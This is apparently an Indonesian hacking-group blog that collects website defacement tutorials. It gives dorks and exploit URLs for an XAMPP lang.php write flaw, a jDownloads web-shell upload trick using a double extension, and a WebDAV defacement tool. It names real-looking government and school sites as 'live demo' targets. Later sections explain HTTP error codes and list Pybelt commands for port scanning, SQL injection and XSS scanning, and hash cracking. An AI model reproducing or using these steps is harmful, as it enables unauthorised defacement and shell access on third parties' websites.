Deface Xampp Local Write Access

Deface Xampp Local Write Access 
Dork :

• inurl:/xampp/lang.php
• inurl:/security/lang.php

Exploit : 

• /xampp/lang.php?Hacked_By_FamilyAttackCyber Untuk Dork inurl:/xampp/lang.php
• /security/lang.php?Hacked_By_FamilyAttackCyber Untuk Dork inurl:/security/lang.php

Live Demo Fresh :
http://metrologi.kemendag.go.id/xampp/

Masukkan Exploit jadi begini http://metrologi.kemendag.go.id/xampp/lang.php?Hacked_By_FamilyAttackCyber

 VULN Seperti gambar di atas ^_^ Lalu Langsung Cek deh Gimana Ceknya ?
/xampp/lang.tmp
/security/lang.tmp
Jadi kita pake yang /xampp/lang.tmp

 Gampang Kan ? Hehehehehe

Deface JDownloads Shell Upload

Deface JDownloads Shell Upload
Dork :
Powered by jDownloads/index.php?option=com_jdownloads
inurl:/index.php?option=com_jdownloads intext:Powered by jDownloads
Live Demo Yang Segar : http://sekolahkirana.com/
Exploit : /index.php?option=com_jdownloads&Itemid=1&view=upload

Dorking Dahulu Dork nya atau bisa kita gunakan pake live demo :)
tambahkan  Exploit menjadi http://sekolahkirana.com/index.php?option=com_jdownloads&Itemid=1&view=upload atau http://sekolahkirana.com/index.php?option=com_jdownloads&Itemid=74&view=upload

 Sebelum itu simpan lah Shell Yg Ext .php.php.j Contoh fac.php.php.j kalian bisa pake shell pribadi & buat yg ext .php.php.j . Setelah itu Klik Send File :) tapi setelah di upload bagian screenshot otomatis shell berubah menjadi .php.j :)
Akses Shell ? images/jdownloads/screenshots/namashell.php.j
Akan Seperti ini :)

Sekian & Terimah Kasih Join grub ea FAC GRub

Deface Teknik Webdav

Deface Teknik Webdav
Banyak yang PM teknik ini, udh tau nih teknik gampang mending gw share aja dah :) bagi" ilmu juga wkkwkwkw :v
Download dahulu Toolsnya

Download

Live Demo : 

http://doacoes.fussesp.sp.gov.br/

http://www.csirt.sp.gov.br/
Download, Ekstrak dan buka tuh tools

Simpan tuh Live demo di notepad lalu klik load file dan klik setting. Pada Name of Your Shell ganti dengan hckd.html atau bebas sih akhiran .html atau htm pada kotak write your shell isi dengan script deface lu abis itu klik serang

Hubblaaaa , Jika sukses seperti ini :) sekarang buka web nya deh jadi kaya gini http://doacoes.fussesp.sp.gov.br/hckd.html

Sekian & Terimah kasih :)

Kumpulan Arti Kode 401, 403, 404, 406, 500, 503, 509 Pada Website

Kumpulan Arti Kode 401, 403, 404, 406, 500, 503, 509 Pada Website
Pernahkan Kalian ? saat mengakses login admin (Site.com/admin/) tapi 403 ? saat menambahkan site.com/login.php Bisa ? tapi saat login mengakses site.com/admin/ ? Kok bisa gitu ? mari kita pelajari selengkapnya di sini :)

Error 401 : Unauthorized
Status 401 Unauthorized, menyatakan website tidak memiliki hak akses untuk folder yang diproteksi oleh password seperti saat login admin lalu muncul Authentication.

Error 403 : Forbidden
Status 403 Forbidden, menyatakan bahwa saat  mengakses ke folder tujuan. lalu muncul 403 disebabkan oleh kesalahan pengaturan hak akses pada folder.

Error 404 : Not Found
Status 404 Not Found, menyatakan  file atau folder yang diminta, tidak ditemukan didalam database pada suatu website.

Error 406 : Not Acceptable
Status 406 Not Acceptable, menyatakan  permintaan dari browser tidak dapat dipenuhi oleh server.

Error 500 : Internal Server Error
Status 500 Internal Server Error, menyatakan ada kesalahan konfigurasi pada akun hosting.

Error 503 : Service Unavaible
Status 503 Service Unavaible, menyatakan server situs web tidak tersedia sekarang. Sebagian besar waktu ini adalah karena server terlalu sibuk atau karena ada yang pemeliharaan yang dilakukan di atasnya.

Error 509 : Bandwidth Limit Exceeded
Status 509 Bandwidth Limit Exceeded, menyatakan bahwa penggunaan bandwidth pada account hosting sudah melebihi quota yang ditetapkan untuk akun hosting pemilik website.

Demikian dari saya , pada kode tersebut mohon maaf jika ada kesalahan ini kan mau masuk ramadhan jadi kita saling maaf-maafaan :) Like Fanspage Guys ^_^ di sebelah kanan :)

Tool Untuk Memudahkan Deface , Pybelt

Tool Untuk Memudahkan Deface ,  Pybelt 

Jika kalian ingin melalukan peretasan mending gunakan Tools ini :) , mari kita Perkenalkan Tools Pybelt.

Pybelt adalah alat memudahkan peretas yang berbasis Python yang mampu memecahkan hash tanpa pengetahuan sebelumnya tentang algoritma, memindai port pada host tertentu, mencari kerentanan SQLi di URL yang diberikan, Mencari Website Dengan Google Dorks tanpa verikasi google, memverifikasi algoritme dari Hash yang diberikan, memindai URL untuk kerentanan XSS, dan menemukan proxy HTTP yang dapat digunakan.

Fitur - Fitur : 

• Port Scanner
• SQL Injection scanner
• Dork Checker
• Hash Cracker
• Hash Type Verification
• Proxy Finder
• XSS Scanner

Untuk Melanjutkan Tahap Installan kalian install dahulu Python silahkan download di google ya :)
sekarang Download Dahulu Tool Nya :)

Download

Ekstrak di Local disk C:\ biar mudah :) , dan ubah nama folder tersebut menjadi install ( bebas sih ganti nama aja biar mudah gw pake nama install ) lalu buka cmd dan ketik cd C:\install atau cd C:\ lalu cd install :)

Abis itu masukkan ini di cmd -> pip install -r requirements.txt

Lihat gambar biar ngerti ea 

Tunggu ampe selesai installan , jika selesai akan seperti ini :)

Selesai deh :) untuk gunakan Fitur lihat di bawah :

• python pybelt.py -p 127.0.0.1 Scan Port pada host local
• python pybelt.py -s http://example.com/php?id=2 Scan SQL 
• python pybelt.py -d idea?id=55 Dork Scanner
• python pybelt.py -c 9a8b1b7eee229046fc2701b228fc2aff:all Memecahkan hash menggunakan semua algoritma yang ada di komputer. 
• python pybelt.py -v 098f6bcd4621d373cade4e832627b4f6 Mencari Verikasi Jenis HASH Seperti MD5
• python pybelt.py -f Menemukan Proxy yang bisa di gunakan
• python pybelt.py -x http://127.0.0.1/php?id=1 Mencari Isi Website untuk Kerengtanan XSS

Sekian dan Terimah kasih silahkan Like Fanspage kami biar makin Enjoy :)